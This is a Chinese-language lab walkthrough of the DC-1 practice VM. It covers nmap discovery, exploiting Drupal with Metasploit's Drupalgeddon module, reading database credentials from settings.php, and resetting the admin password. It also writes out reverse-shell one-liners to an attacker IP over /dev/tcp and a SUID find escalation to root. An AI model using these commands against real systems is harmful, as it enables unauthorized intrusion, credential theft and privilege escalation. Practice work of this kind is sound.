【靶场实战】dc-1靶机 渗透测试

参考文章

• DC-1 靶机安装及练习
• tag：
• Ref：

本片文章仅供学习使用，切勿触犯法律！

---

一、搭建环境

搭建环境
下载地址：dc-1
加压后用VMware打开，配置网络适配器为NAT模式

注意：dc-1开机后会提示输入账号密码，这里可以不用管他。

开启kali虚拟机，同样的，配置网络适配器为NAT模式

测试环境

1. 在kali终端输入：ifconfig，查看当前网段
   
   可知，当前c段是 192.168.224.0
2. 用nmap扫描整个c段，输入nmap -sP 192.168.224.0/24
   
   很明显，192.168.224.129 就是dc-1的ip地址
3. 查看dc-1开放端口，输入nmap -sS 192.168.224.129
   
   很明显，开放了，22.80.111 端口。
4. 访问 192.168.224.129:80 打开浏览器输入：http://192.168.224.129:80
   
   说明环境搭建成功

二、getshell

由防问http://192.168.224.129:80，在其页面中发现drupal ，这个是一个开源的cms。我们针对这个使用msf进行测试。

使用msf进行测试

1. 查找drupal的相关漏洞。输入msfconsole，然后输入search drupal
   
2. 使用exp进行攻击，并设置攻击机IP，目标机IP，可以使用options查看配置情况
   输入use exploit/multi/http/drupal_drupageddon
   输入set rhost 192.168.224.129
   输入set lhost 192.168.224.130
   
   
3. 输入run，或exploit，启动，
   
4. 如果出现meterpreter，说明成功了，尝试输入shell，获取命令行。
   
   至此已经getshell了，

三、渗透流程

按照官方描述，需要我们找到5个flag。

1、flag1

在根目录下搜索，flag文件。即find / -name flag*

先去查看flag_1.txt文件。

提示需要查看cms的配置文件。这里就要思考drupal的默认配置文件命名和默认路径。

2、flag2

百度搜索易知，drupal的默认配置文件在www/sites/default/settings.php，打开后内容如下：

其中提示我们，并且暴露了数据库的账号密码，去看看数据库吧。
暴力破解和字典攻击并不是获得权限的唯一方法（您将需要访问权限），你能用这些证件做什么？

3、flag3

输入mysql -udbuser -pR0ck3t 链接数据库，输入show databases;查询数据库

似乎在mysql没有交互的shell，使用起来不怎么方便，尝试反弹shell。

反弹shell
反弹shell的方法有很多种。
用文件描述符反弹shell，bash -i >& /dev/tcp/192.168.224.130/6666 0>&1 失败。
用python语言反弹shell，python -c 'import pty; pty.spawn("/bin/bash")' 成功。

用php语言反弹shell，php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.224.130/6666 0>&1")'，失败。

查询数据库
登录mysql输入mysql -u dbuser -p，再输入密码R0ck3t。

查询数据库：
show databases;

使用drupaldb数据库，并查看数据库所有表，

use durpal;
show tables;

查users表的列：
select * from users

发现有admin用户，但密码是hash值，尝试使用john破解，失败了。尝试替换密码。

修改密码

1. 打开password-hash.sh文件
   
2. 修改数据库账号密码
   
   在网页登录，账号是admin，密码是刚刚修改过的，也是admin。

登录后，点击dashboard，发现flag3。点击flag3，提示需要找passwd文件。

4、flag4

输入命令find / -name passwd

逐个排查后，在/etc/passwd中发现flag4，并发现flag4.txt，并提示需要提权

5、thefinalflag

使用find查看哪些可以提权：
find / -type f -perm -4000 2>/dev/null

使用find命令提权：
find -name flag4.txt -exec '/bin/sh' \;

找到最后的flag。至此dc-1的靶机渗透结束。